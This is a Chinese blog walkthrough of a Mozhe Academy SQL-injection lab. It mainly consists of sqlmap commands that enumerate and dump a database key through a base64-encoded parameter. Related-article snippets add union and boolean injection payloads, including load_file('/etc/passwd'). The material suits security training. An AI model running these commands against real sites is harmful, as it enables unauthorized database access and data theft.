墨者学院 --SQL注入实战-MySQL

最新推荐文章于 2024-06-08 15:21:52 发布
最新推荐文章于 2024-06-08 15:21:52 发布
阅读量458 收藏 4
点赞数 1
文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45914445/article/details/117407002
版权

一、粗略判断是否存在sql注入

1.访问链接:http://219.153.49.228:40602/

id=MQo= ------->有可能存在sql注入,并且看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为1

二、kali虚拟机精确判断

需注意(网站id采用的是base64加密的结果 故用sqlmap注入时也必须先用base64加密)

1.判断网站是否存在sql注入漏洞(设置level=4)

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4

2.查看该网站下的数据库

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 --dbs

3.查看该网站当前使用的数据库

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 --current-db

4.查看当前使用数据库下面的表

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test --tables

5.查看敏感表中的列名

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test -T data --columns

6.爆破敏感列名下的元素

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test -T data -C thekey --dump

得到key,SQL注入成功!

weixin_45914445
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络安全SQL 注入实战
m0_74131821的博客
05-10 1096
今天通过实战,给大家演示一下SQL注入攻击!
墨者学院SQL注入实战--MySQL
Chris_HackFromCN的博客
08-10 771
目录手工注入工具注入(中转型)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 手工注入 辅助工具:小葵多功能转换工具 作用:编码解码、加密解密 1.首先,启动靶场环境,根据URL显示,可知目标
SQL注入实战
qq_44915227的博客
04-17 1803
所谓的SQL注入,就是通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或页面请求的查询字符串递交到服务器,达到欺骗服务器,让服务器执行这些恶意的sql命令,从而让攻击者,可以绕过一些机制,达到直接访问数据库的一种攻击手段,而不是按照设计者意图去执行SQL语句。
SQL注入实战
hxhabcd123的博客
08-28 2457
本文记录各种SQL注入类型的实操过程
入门级 SQL 注入实战
菜鸟学识的博客
06-08 779
得到users表的所有字段。uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。直接在username中填写admin’or 1=1#,password随便写,此时登录成功,Username存在SQL注入漏洞。
sql注入实战
2201_75735270的博客
07-31 944
SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,实质就是将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来攻击所有的SQL数据库。
SQL注入实战总结
qq_44657899的博客
06-16 1405
文章目录0x01 联合注入:union0x02 boolean注入 盲注 0x01 联合注入:union database()库名 user()用户 version()版本号 load_file('/etc/passwd') group_concat(password) 0x02 boolean注入 盲注 基本思路 and 1=1 返回1 yes and 1=2 返回0 no 判断数据库长度 ' and lenth(database())>=4 --+ 判断数据库名字 ' and substr(d
墨者学院 - SQL注入实战-MySQL
多崎巡礼的博客
08-08 2009
两种解法 一、利用sqlmap及其tamper模块base64encode使用 1. 看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为1 2.查看当前的系统信息 sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode 3.暴库 sqlmap -u "http:/...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
一篇文章教你玩转,入门级 SQL 注入实战
朱雀随云记的博客
04-11 652
uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。
入门级SQL注入实战-sqli_labs
2302_76378481的博客
06-15 1163
ascii表的s值对应的是115,如果我们猜测到115的时候,and后面的值为真,前面的值也为真,就会出现 1 and 1的情况, 页面就会有提示信息。确定数据库的表是3列了,接下来使用union联合查询,查询当前数据库名,查询时讲前面的查询语句设为空,所以输入没有的值,111 union select 1,database(),3,后面代码逻辑第一行不显示,所以在第二个字段查询。大家好,这篇文章写的是一些入门级简单的sql注入,可以简单看一下,写了集中注入的手法,联合注入、报错注入、布尔盲注、延时盲注。
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1156
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
【burpsuite安全练兵场-服务端1】SQL注入-17个实验(全)
热门推荐
12-27 1万+
【BP靶场-服务端-SQL注入】16个实验-万文详细步骤
SQL注入MySQL注入
weixin_51583033的博客
12-20 842
SQL注入MySQL注入
sql手工注入实战
mulincong的博客
05-30 2262
sql手工注入封神台靶场
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值